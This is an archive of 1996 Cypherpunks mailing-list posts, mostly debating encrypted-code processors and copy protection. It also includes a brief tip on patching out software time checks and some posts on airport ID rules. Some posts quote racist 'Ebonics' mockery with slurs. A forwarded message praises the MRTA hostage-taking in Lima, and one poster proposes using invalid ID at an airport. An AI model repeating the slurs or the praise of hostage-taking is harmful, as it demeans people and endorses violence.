>If the old copy protection just worked, it would have been widely accepted.

Again, there is a complex infrastructure which offers the customer no
obvious benefit.  I disagree that copy protection would have been widely
accepted, even had it worked smoothly.  In fact, this scheme can be
characterized as a scheme to make copy protection work.

(Slightly tangentially, when my wife was in China at the Women's Conference
NGO meeting, someone walked off with a collection of copy protection
dongles as souvenirs.  The people who wanted to use the software were SOL.)


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@herringn.com
Date: Fri, 20 Dec 1996 13:36:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <1.5.4.32.19961220040241.003a6284@popd.ix.netcom.com>
Message-ID: <l03010d01aee0aea83b39@[204.57.198.5]>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Stewart wrote:
>> I've heard that in less civilized parts of the world you're actually
>> required to carry government-issued ID cards to walk down the street
>> or fly on airplanes.
>
>Umm.. tried to get on a flight without having ID lately?  Doesn't work -
>against policy.  Anti-terrorism policy and all.. it's for your own
>safety, of course.

Flew down to LA recently with a firearm (checked, of course).

Looking over the ticket later, I was mildly surprised to find "GUN" in
a string of otherwise unintelligible text.

Anyone know if this is they way it's been, or if this is YA "Anti-terrorism
security measure"? Goes without saying that this data would most likely
wind up as part of the "travel profiles" the gov't wants to compile. Could
they be starting early?

The carrier was Alaska Airlines, if it matters.

As far as the photo-id went, they didn't copy any data off it or try to
authenticate, just made sure it was my picture.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 20 Dec 1996 11:36:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <961220133919_169266741@emout13.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-20 03:30:46 EST, you write:

<< > >You could also timestamp the software so that it only runs for a given
 > >length of time.  This will encourage people to upgrade regularly.  ;-)
 > >>
If anyone thinks it is anything but trivial to track down a call for
time/date and a comparison of the two.. and then overwrite the area with some
nop's to make sure the address jumps come out the same.. your sadly mistaken
=-}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Fri, 20 Dec 1996 14:06:30 -0800 (PST)
To: Aaron <cypherpunks@toad.com
Subject: Re: Solidarity with Peruvian Guerrilla!
In-Reply-To: <v02130501aee03559777a@[136.152.11.117]>
Message-ID: <32BB0DA1.7305@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


Aaron wrote:
> 
> P.S. Plans are being made for a demonstration at the Peruvian
> Consulate in San Francisco, California -- probably on Monday, December
> 23. If you live in the area, please send me an e-mail message.

Done.

This could be a real blast!

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Fri, 20 Dec 1996 14:09:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: nyetscape 3.x bug
Message-ID: <199612202209.OAA11403@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody noticed that netscape 3.x has a bug that brings the last page
that I was on onto the next page that I go to, do I need to delete a history
file or something, or does anybody have the answer to resolving this problem.

Sincerely,
PsiD
pSIONIC dAMAGE
Zer0 Faith Inc.
www.geocities.com/SiliconValley/Heights/2608
H/P/A/V/C ANTIVIRUS/COUNTERSECURITY
"ONLY THE ELITE SURVIVE!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Fri, 20 Dec 1996 14:11:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks (was Re: Encryption ?
In-Reply-To: <199612201325.OAA03035@basement.replay.com>
Message-ID: <32BB0EC3.7830@disposable.com>
MIME-Version: 1.0
Content-Type: text/plain


Stop bashing Dale, you ADL/CFR/NSA thought police, you.

-rich

Name Withheld by Request wrote:
> 
> I thought this was so funny I've saved it.
> 
> Perhaps we could vote on the quality of Dale's ideas
> and arrive at an estimate of the proportion of NSA supporters on the
> list.
> 
> THE AKOND OF SWAT
> 
>    :Date: Thu, 19 Dec 1996 07:36:03 -0800
>    :From: Dale Thorn <dthorn@gte.net>
>    :To: SHARK <otaner@boun.edu.tr>
>    :Cc: cypherpunks@toad.com
>    :Subject: Re: Encryption ?
>    :
>    :SHARK wrote:
>    :>
>    :> I am a Mathematic student at Bosphorus University in Turkey.
>    :> I am interested in both computer applications and mathematical
>    :> base of encryption.Where can I find this kind of staff on
>    :> internet. Is it necessary to have high level of mathematical
>    :> background in order to deal with encryption??
>    :>
>    :> By the way Is there any member of this list from Turkey?
>    :
>    :There are a lot of NSA people here on cypherpunks, and they try 
>    :very hard to control encryption, to make everyone think it is 
>    :difficult, to discourage independent inquiry.
>    :
>    :That is the main reason they accuse people of being snakeoil 
>    :vendors, to discourage people from inquiring about really new 
>    :ideas, like some of my ideas for example.
>    :
>    :Just so you know....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Fri, 20 Dec 1996 13:15:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
Message-ID: <199612202115.OAA11015@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> wrote:

>In order to remain compliant with the new California law requiring
>increased use of "Ebonics," the new academic name for "Black English" (and
>known by honkey mofos as "ghetto jive"). Apparently the coloreds have had
>enough of "standard English" and its repression of their culture. To meet
>the requirements of this new law, 10% of my posts from now on will be
>written as best I can manage in the Ebonic language.

("Ebonics" elided)

There's got to be a better way than Ebonizing manually. First there was the
Canadianizer, eh, hoser? Then there was Zippy
(www.metahtml.com/demos/zippy/), which is terrific for Willy/Freeh/Reno
speeches. We really need an Ebonizer (TM)!

BTW, Tim's not kidding about the Oakland, CA school system.  Check your
regular news source.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Fri, 20 Dec 1996 14:17:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: C2Net Party: January 24th
Message-ID: <199612202218.OAA23181@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


		       http://www.c2.net/party/
				C2NET

			  is having a party

			     January 24th

				  at

			   654 Mission St.
			    San Francisco

			   assorted snacks,
			      a cash bar
				 and

			      live music
				  by
			WEIRD BLINKING LIGHTS

		       with dj accompaniment by
		       DJ FLINT and DJ PINNIPED

		  will be present for your enjoyment

			 Festivities begin at
				 8PM

		       We hope to see you there

---
Directions:

>From the West or North:

        Take Oak Street East.
        Turn left on Laguna.
        Turn right on Fell.
        Fell crosses Market and becomes 10th Street.
        Merge left within one block of Market.
        Turn left on Mission.

>From the East:

        Take Hwy 80 West across the Bay Bridge.
        Take the first exit on the left (Harrison Street exit)
        Turn left on Harrison.
        Turn right on 3rd Street.
        Turn right on Mission.

>From the South:

        Take Hwy 280 North.
        Follow 280 to its end at 4th & King Streets.
        Follow King Street to its end at 3rd Street.
        Turn left on 3rd.
        Turn right on Mission.

>From BART:

	Take BART to the Montgomery station
	Walk south on New Montgomery Street
	Turn right on Mission.

Parking:

	There is a commercial parking lot across the street on Mission
	and another one on the corner of 3rd and Mission.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yanni <jon@clearink.com>
Date: Fri, 20 Dec 1996 14:24:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612202115.OAA11015@web.azstarnet.com>
Message-ID: <9612201424.AA39450@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, Dec 20, 1996 at 1:15:20 PM, drose@AZStarNet.com wrote:
> There's got to be a better way than Ebonizing manually. First there was
> the Canadianizer, eh, hoser? Then there was Zippy (www.metahtml.com/
demos/
> zippy/), which is terrific for Willy/Freeh/Reno speeches. We really
need
> an Ebonizer (TM)!
>
> BTW, Tim's not kidding about the Oakland, CA school system.  Check your
> regular news source.

As you can see from the URL below, the Oakland Unified School District
has already converted their homepage...

http://www.somat.com/somat/jive.pl?filter=jive&url=http%3A%2F%
2Fousd.k12.ca.us%2F

;)

Jive is an old old old filter...read one of the back issues of Tired
about the fight between two hackers that is where it originated...I
po'ted da damn  slow mo-fo source (based in yacc/lex) t'a simple
macintosh applicashun some while back...

-jon

Jon (no h) S. Stevens        kid@latchkey.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
MultiHomie - MultiHoming for Mac WebServers
http://www.clearink.com/fun_stuff/plugins/
The Internet Weather Report
http://www.internetweather.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Fri, 20 Dec 1996 11:40:48 -0800 (PST)
To: dthorn@gte.net.cypherpunks@toad.com
Subject: Dale defends free society from the NSApunks (was Re: Encryption ?
Message-ID: <199612201325.OAA03035@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought this was so funny I've saved it.

Perhaps we could vote on the quality of Dale's ideas
and arrive at an estimate of the proportion of NSA supporters on the list.

THE AKOND OF SWAT


   :Date: Thu, 19 Dec 1996 07:36:03 -0800
   :From: Dale Thorn <dthorn@gte.net>
   :To: SHARK <otaner@boun.edu.tr>
   :Cc: cypherpunks@toad.com
   :Subject: Re: Encryption ?
   :
   :SHARK wrote:
   :> 
   :> I am a Mathematic student at Bosphorus University in Turkey.
   :> I am interested in both computer applications and mathematical base of
   :> encryption.Where can I find this kind of staff on internet.
   :> Is it necessary to have high level of mathematical background in order to
   :> deal with encryption??
   :> 
   :> By the way Is there any member of this list from Turkey?
   :
   :There are a lot of NSA people here on cypherpunks, and they try very
   :hard to control encryption, to make everyone think it is difficult, to
   :discourage independent inquiry.
   :
   :That is the main reason they accuse people of being snakeoil vendors,
   :to discourage people from inquiring about really new ideas, like some
   :of my ideas for example.
   :
   :Just so you know....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 14:29:22 -0800 (PST)
To: Andrew Loewenstern <hal@rain.org>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b07aee0be8c52d2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:19 PM 12/20/1996, Andrew Loewenstern wrote:
>Hal Finney writes:
>>  The answer presumably is that the software manufacturer will
>>  sell software with such limits for much less than he will sell
>>  unlimited software.  That's because software piracy is such
>>  a major problem, and this way he can be protected against
>>  piracy from this copy of his program.  So people with these
>>  CPU's can buy their software a lot cheaper.

> I believe this is a pipedream.  As it stands now, virtually all of the
> software that requires special hardware dongles is ridiculously expensive,
> even compared to similar offerings from other companies.

Why do you think this is?  I don't understand why I would buy a more
expensive package that required a dongle rather than a less expensive
package which does not.  This is mysterious.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 14:31:15 -0800 (PST)
To: Bill Frantz <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b08aee0befb6cdb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:29 PM 12/20/1996, Bill Frantz wrote:
>At 11:52 AM -0800 12/20/96, Peter Hendrickson wrote:
>> If it's worthwhile having a backup processor around, then you just have
>> to spend a little more to have backup software, too.

> I thought your model was cheap processors and expensive software.  I.e.,.
> The cost of the software is greater than the cost of the hardware.  Sounds
> like more than just "a little more".

There's no reason why one software package would cost more than the
machine.  I was assuming you didn't need your whole software library
to finish the report.

I would expect software prices to drop because everybody using the software
would be paying for it.  I would also expect more kinds of software to become
available.

At any rate, I just don't see this as a major problem.  Does anybody
know how often processors break down these days?  My guess is that
it is less common than getting into a car accident and much less common
than all the other factors that make reports late.

If companies started metering software, then this problem pretty much
evaporates.

>> If the old copy protection just worked, it would have been widely accepted.

> Again, there is a complex infrastructure which offers the customer no
> obvious benefit.

The obvious benefit is that when you purchase software you don't have
to pay for software development for the people who don't pay.  Few
people find this objectionable in principle.

It is not out of the question for software vendors to sell two versions
of the same software.  One is the piracy-free version and the other is
the copy-as-much-as-you-can version.  I would expect the piracy-free
version to be substantially cheaper.

(Of course, it is not out of the question that piracy boosts sales by
advertising the product.  We haven't seen a good experiment for
determining this.)

> I disagree that copy protection would have been widely accepted, even had
> it worked smoothly.  In fact, this scheme can be characterized as a scheme
> to make copy protection work.

Your characterization is accurate.  Ignoring the particulars of this
scheme, it would certainly be neat if people could sell software
without it being pirated.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 20 Dec 1996 12:11:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Solidarity with Peruvian Guerrilla! (fwd)
Message-ID: <199612202032.OAA06580@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

MRTA is a bunch of terrorists, irrespective of whether the issues they are
trying to deal with are legitimate. They have threatened to kill people
if they don't get their way. This alone is enough for me to not support 
them. They also have taken their internal bitch outside their unhappy 
home and involved other nationalities. If they were my neighbors I would
call the cops and if allowed on the jury I would give them the max.

What I would suggest is that the Japanese take as many of the MRTA out
as they possibly can.

I support the Japanese. Screw the MRTA and the Peruvian government, little
Hitlers are little Hitlers.

Banzai!

                                                    Jim Choate
                                                    CyberTects


Forwarded message:

> From cypherpunks-errors@toad.com Fri Dec 20 14:21:00 1996
> Message-Id: <v02130501aee03559777a@[136.152.11.117]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Fri, 20 Dec 1996 06:16:20 -0800
> To: aaron@burn.ucsd.edu (All recipients)
> From: aaron@burn.ucsd.edu (Aaron)
> Subject: Solidarity with Peruvian Guerrilla!
> Cc: nyt@blythe.org (nyxfer), seac+nafta@ecosys.drdr.virginia.edu,
>         bc05319@binghamton.edu (TAZ), BAYLEFT@cmsa.Berkeley.EDU,
>         red-skinheads-l@eart.com, anarchy-list@cwi.nl, spg-l@xs4all.nl,
>         LABOR-L@YORKU.CA, a-infos@lglobal.com
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> ** See list of useful Web sites at end of this post! **
> 
> Companer@s,
> 
> I am writing this while I am tired and should be asleep, since I think that
> this matter is too urgent to delay. I apologize for any careless
> formulations.
> 
> By now, you all know that the Peruvian guerrilla group MRTA (Movimiento
> Revolucionario Tupac Amaru) has occupied the mansion of the Japanese
> ambassador in Lima and is holding several hundred prisoners. Unless you are
> in an unusual part of the world, you also have seen how the bourgeois media
> are discussing the matter as a problem of how to deal with 'terrorists.'
> 
> For the working people and all the oppressed and exploited of the world,
> and for socialists, communists, and anarchists, the seizure of the
> ambassador's residence along with about 400 bourgeois dinner guests is a
> great accomplishment. It is a blow against the terrorism of the Peruvian
> state and its imperialist patrons! Those captured in the raid include many
> members of the Peruvian and international ruling elite, including the head
> of Peru's secret police! It will be politically very difficult for the
> Peruvian state to launch a military attack as a means of resolving the
> crisis, since that would create quite a few 'illustrious corpses' and lead
> to a falling out among bourgeois sectors.. (And it would be difficult to
> get the world's poor majority to join the bourgeoisie in mourning its
> dead!) It seems that there is already a falling out between Fujimori and
> the Japanese over Fujimori's refusal, so far, to negotiate.
> 
> It is very important that the situation in Lima not be resolved in a way
> that can be seen as a victory for the bourgeoisie. It is our task to
> publicize who the real criminals are in Peru and to help wring concessions
> from the Peruvian dictatorship. In particular, we should demand the release
> of all political prisoners and prisoners of war from Peru's hideous
> torture-chamber prisons. In this context, let's not get involved in
> sectarian battles among the various factions of Peru's anti-government
> left. Whatever differences the groups have, and these are very serious, we
> must keep in mind that the Peruvian state and its imperialist backers (in
> Washington, Tokyo, London, Bonn, etc.) are the main enemy. All political
> prisoners must be released, whether of MRTA, the PCP (Shining Path) or
> neither.
> 
> Thanks to the widespread publicity given to the events in Lima, many more
> people will be interested in what we have to say about Peru than normally
> would. Let's organize demonstrations at Peruvian Embassies, Consulates,
> airline offices, etc. Let's raise our voices in whatever forum may be
> available to defend the heroic guerrillas and to denounce the real
> terrorists.
> 
> --In solidarity,
> --Aaron <aaron@burn.ucsd.edu>
> 
> P.S. Plans are being made for a demonstration at the Peruvian Consulate in
> San Francisco, California -- probably on Monday, December 23. If you live
> in the area, please send me an e-mail message. Otherwise, do what you can
> in your area!
> 
> SOME USEFUL WEB SITES:
> 
> Web site on the current crisis:
> <http://burn.ucsd.edu/~ats/mrta.htm>
> 
> What Are The Goals Of Your Embassy Occupation? -- Interview With Norma
> Velazco, Representative Of The Tupac Amaru Revolutionary Movement (MRTA) In
> Peru:
> <http://burn.ucsd.edu/~archive/ats-l/1996.Dec/0089.html>
> 
> Partial list of hostages:
> <http://burn.ucsd.edu/~archive/ats-l/1996.Dec/0092.html>
> 
> MRTA's web site in Europe:
> <http://www.cybercity.dk/users/ccc17427/>
> 
> Lima's best bourgeois newspaper (in Spanish):
> http://ekeko.rcp.net.pe/LaRepublica/
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Fri, 20 Dec 1996 15:10:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Get All The Phrack Issues
Message-ID: <Love@23602>
MIME-Version: 1.0
Content-Type: text/plain


For a ton of (mis)information, read Phrack.

Rather than downloading an issue at a time, get it all at:

http://www.crl.com/~varange/maillists/phrack.zip

0d0a text formatted.

If you have a lot of paper:

unzip -c phrack > /dev/lp0

Or something like:

pkunzip -c phrack > prn

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 20 Dec 1996 13:19:32 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Executing Encrypted Code
In-Reply-To: <199612201543.HAA02076@crypt.hfinney.com>
Message-ID: <9612202119.AA00892@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney writes:
>  The answer presumably is that the software manufacturer will
>  sell software with such limits for much less than he will sell
>  unlimited software.  That's because software piracy is such
>  a major problem, and this way he can be protected against
>  piracy from this copy of his program.  So people with these
>  CPU's can buy their software a lot cheaper.

I believe this is a pipedream.  As it stands now, virtually all of the  
software that requires special hardware dongles is ridiculously expensive,  
even compared to similar offerings from other companies.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@disposable.com>
Date: Fri, 20 Dec 1996 12:27:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Flying on planes without ID
In-Reply-To: <32BA5ABE.64F2@pnis.net>
Message-ID: <199612202025.PAA25899@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Vangelis wrote:
> 
> Bill Stewart wrote:
> > I've heard that in less civilized parts of the world you're actually
> > required to carry government-issued ID cards to walk down the street
> > or fly on airplanes.
> 
> Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> against policy.  Anti-terrorism policy and all.. it's for your own
> safety, of course.

You beat me to it.

Anyone have the current black-letter regulations? I'll have some time
to kill over the holidays that might as well be used for civil 
disobedience. What's likely to happen to me if I refuse to show ID? 
Provide invalid ID, don't get caught, then publicize the fact? Provide 
invalid ID and get caught? Or, better:

"My wallet was stolen. The only ID I have on me is my ACLU membership 
card and my PGP key. Can I still get on the plane?"

I'm serious. Short domestic flight, no pressing appointments. This could 
be fun.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMrr2LyoZzwIn1bdtAQFNVAGAsm79cKZ0T3DZQuV7l13w86WTIu0aVlyh
1JhPsiBCw0iw6+n6zsPzbawaRXR43X39
=BhS6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 15:26:21 -0800 (PST)
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b09aee0c530e242@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:17 PM 12/20/1996, Andrew Loewenstern wrote:
> I think this whole idea of encrypted software and processors is pretty
>poorly
> thought out.

Thank you for this encouraging remark.

> How do you handle an organization with a site license for 20,000 users of a
> piece of software?  Do you issue 20,000 unique copies?

Yes, that would be necessary.  It isn't hard to tell which executable
goes with which processor.  The software vendor could give away a database
to do it.  Or, the software vendor could put all the executables up on
a web site.  What's the big deal?

> Do you really think the lower price of the software is going to offset
> the cost of an organization to manage all those processor certificates?

Yes, I do.  (BTW, the software might be sold for the same price, but
be better in other ways.)

> Site licensed software is already about as cheap as the companies are willing
> to sell it.

In the current business environment.  One reason site licenses are sold
to companies is to make piracy less encouraging.  It also solves a difficult
bookkeeping problem: "How many copies are we running?  Are we in compliance
with the law?"  Actually, site licenses don't always solve this problem,
but they sort of do.

We don't really know what pricing and terms would look like in a piracy-free
environment, we can only guess.  My guess is that preventing piracy makes
more software available for better prices.  If metering is feasible, it would
work out very well because customers no longer have to take a chance on
software and can easily explore all of the options they have.

> How about the extra hard drive space you have to purchase because you can't
> just keep one copy on a server anymore?

Let's assume 10MB of executable code per package.  A gigabyte costs about
$200 now.  That comes out to about $2 extra expense per software package.

> Think about what a nightmare it would be to update a piece of software on
> 20,000 machines simultaneously!!  It's hard enough to do it now!!

Whoever is doing the updating just needs to be able to quickly get the
right copy.  That's easy because each software module is self-identifying
as is each processor.  You just need to be able to go out on the Net
to the software vendor or internally and ask some machine for the
particular copy you need.

> What happens if a software company goes out of business?   You are then
> completely screwed when your processor dies or becomes obsolete.

This is true.  Most people make their software buying decision based on
what it can do now and for the next few years.  I believe that is rational.

> Around here we still run a few pieces of ancient hardware that were pretty
> pathetic back in 1988.  The software on them is critical but won't run on
> anything else and there is no source code available.  Believe me, nobody
> here would dare to make that mistake again!!!  At least with our current
> situation if the hardware dies we would probably be able to find a
> replacement (and I'm sure there are some replacements waiting in the stock
> room...).  But with your encrypted processor we couldn't even do that!

Yes, it would definitely be harder to keep a code museum.  People who
plan on doing that are encouraged to choose another platform and software
set.

> It seems to me that this is yet another scheme that basically does nothing
> but seriously inconvenience the software user.  Much like clipper, I believe
> this is a dog that won't hunt!!

I find it interesting that you compare this scheme to Clipper.  Judging
from the tone ("!!!") of your post, there is something about my scheme
which you find upsetting.   People usually don't get annoyed by schemes
which won't work.  (Even dumb unworkable schemes are a breath of fresh
air on this list right now.)

What I think you really don't like about my scheme is that you think it
might work and you fear various mandatory GAP proposals that could follow
its wide acceptance.  I would be interested to hear more about these
concerns.

> Perhaps instead of trying to find a way to force users into paying, software
> companies should concentrate on how offer more value and make their prices
> seem more attractive.

These are not either/or propositions.  If the decrypting processor
increases the revenue of software companies, it means people can make
more money providing better products to their customers.

> Even with piracy, the software industry is far and away the most profitable
> of all!!

There is no such thing as "profitable enough."

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 20 Dec 1996 15:25:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Code+Data separation
Message-ID: <v02140b02aee0d06aa8ec@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>>Are there any modern processors which keep the code and data separated?
>

A Harvard architecture is a common feature of signal processing chips.  A
number of japanese DSP chips (especailly for image processing) in the early
90's used this approach.  I believe some earlier models in the TI 34000
series did also.  Not sure about the current crop.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Dec 1996 15:58:14 -0800 (PST)
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b0aaee0d241f441@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 12/20/1996, Andrew Loewenstern wrote:
>Peter Hendrickson writes:
>>  I would expect software prices to drop because everybody using
>>  the software would be paying for it.

> I don't mean to sound rude or insult you personally, but this is utterly
> absurd.  If everyone is paying for the software then the company would be
> making even MORE money.  Only a fool would want to make less money!!  If
>money
> wasn't important to these people they wouldn't be in the business of selling
> software in the first place!

> Aside from putting a gun to people's heads, the only thing that lowers
>prices
> is competition.

Yes, I was assuming a free market.  Sorry if that was not clear.

Not only would software companies face competition in the decrypting-processor
market, but they also face competition with other packages running on
other platforms.

Presumably customers would need some sort of reason to use the
decrypting-processor.  Some companies may choose lower price.

> Only a fool would want to make less money!!

I agree completely!

>>  It is not out of the question for software vendors to sell
>>  two versions of the same software.  One is the piracy-free
>>  version and the other is the copy-as-much-as-you-can version.
>>  I would expect the piracy-free version to be substantially
>>  cheaper.

> That would render the entire scheme pointless.  It only takes _____ONE_____
> copy of the software to get out for the whole world to pirate it.

This was discussed a few posts back.

Let's say you manage to get the secret key out of the decrypting-processor.
That gives you the executable which could run on any decrypting-processor.
Since it is not authenticated (*) you can't run it on another
decrypting-processor.  You can run it in emulation someplace else,
but a heavy performance price is paid.  If the leading edge processors
are all decrypting-processors, a very heavy performance price is paid.
If the instruction set is kept secret, even writing an emulator could
become hard.

(* I am being inconsistent, incidentally.  At one point I said that software
would be authenticated once, but I now realize that to prevent multiple
uses it has to be authenticated for use on a particular processor, too.)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 20 Dec 1996 16:07:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: van Eck snooping
Message-ID: <v02140b04aee0dac21711@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I've done some experimentation in this area.  It is not possible to use a
VCR in a simplified manner anymore as all recent computer CRTs are no
longer use a 60 Hz half-frame, interlaced, format.  Reductions in radiated
emissions, per FCC Part 15, since the earlt 80's have significantly raised
the bar for remote monitoring (still possible though).

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Fri, 20 Dec 1996 14:10:23 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: Ebonics
In-Reply-To: <199612202115.OAA11015@web.azstarnet.com>
Message-ID: <32bb0ec72e07002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


drose@azstarnet.COM said:
> "Timothy C. May" <tcmay@got.net> wrote:
> 
> >In order to remain compliant with the new California law requiring
> >increased use of "Ebonics," the new academic name for "Black English" (and
> >known by honkey mofos as "ghetto jive"). Apparently the coloreds have had
> >enough of "standard English" and its repression of their culture. To meet
> >the requirements of this new law, 10% of my posts from now on will be
> >written as best I can manage in the Ebonic language.
> 
> ("Ebonics" elided)
> 
> There's got to be a better way than Ebonizing manually. First there was the
> Canadianizer, eh, hoser? Then there was Zippy
> (www.metahtml.com/demos/zippy/), which is terrific for Willy/Freeh/Reno
> speeches. We really need an Ebonizer (TM)!

Sounds like Jive. Probably need to update it for the latest hip-hop
lingo, but it's a nice filter.

> 
> BTW, Tim's not kidding about the Oakland, CA school system.  Check your
> regular news source.
> 
> 
> 


-- 
Kevin L. Prigge                     | Some mornings, it's just not worth
Systems Software Programmer         | chewing through the leather straps.
Internet Enterprise - OIT           | - Emo Phillips
University of Minnesota             |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 20 Dec 1996 14:19:31 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b02aee098f27cff@[192.0.2.1]>
Message-ID: <9612202217.AA00908@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


I think this whole idea of encrypted software and processors is pretty poorly  
thought out.  How do you handle an organization with a site license for  
20,000 users of a piece of software?  Do you issue 20,000 unique copies?  Do  
you really think the lower price of the software is going to offset the cost  
of an organization to manage all those processor certificates?  Site licensed  
software is already about as cheap as the companies are willing to sell it.   
How about the extra hard drive space you have to purchase because you can't  
just keep one copy on a server anymore?  Think about what a nightmare it would  
be to update a piece of software on 20,000 machines simultaneously!!  It's  
hard enough to do it now!!

What happens if a software company goes out of business?   You are then  
completely screwed when your processor dies or becomes obsolete.  Around here  
we still run a few pieces of ancient hardware that were pretty pathetic back  
in 1988.  The software on them is critical but won't run on anything else and  
there is no source code available.  Believe me, nobody here would dare to make  
that mistake again!!!  At least with our current situation if the hardware  
dies we would probably be able to find a replacement (and I'm sure there are  
some replacements waiting in the stock room...).  But with your encrypted  
processor we couldn't even do that!

It seems to me that this is yet another scheme that basically does nothing  
but seriously inconvenience the software user.  Much like clipper, I believe  
this is a dog that won't hunt!!

Perhaps instead of trying to find a way to force users into paying, software  
companies should concentrate on how offer more value and make their prices  
seem more attractive.  Even with piracy, the software industry is far and away  
the most profitable of all!!


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@herringn.com
